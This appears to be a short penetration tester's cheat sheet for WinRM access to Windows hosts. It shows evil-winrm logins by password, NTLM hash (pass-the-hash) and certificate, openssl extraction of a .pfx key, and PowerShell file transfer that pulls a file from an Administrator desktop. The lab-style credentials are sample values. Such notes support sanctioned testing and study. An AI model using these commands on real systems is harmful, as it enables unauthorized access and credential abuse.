Access

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i $target
## NTLM hash
evil-winrm -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' -i $target

With a cert file

Extract the certificate and key from the .pfx file

openssl pkcs12 -in yourfile.pfx -clcerts -nokeys -out cert.pem -password pass:yourpassword
openssl pkcs12 -in yourfile.pfx -nocerts -out key.pem -nodes -password pass:yourpassword

Get a shell with the certificate

evil-winrm -S -u 'dev' -p 'supremelegacy' -c ./cert.pem -k ./key.pem -i $target

Transfer file - from Windows

This applies when pentesting on a Windows machine.

Create a session. This works only when you have rights on the target machine (membership in the Remote Management Users group).

$Session = New-PSSession -ComputerName DATABASE01
Copy-Item -ToSession $Session -Path .\samplefile.txt -Destination C:\Users\User\Desktop\
Copy-Item -FromSession $Session -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\

Pass the hash

How it works

evil-winrm -i $target -u "$user" -H "$hash"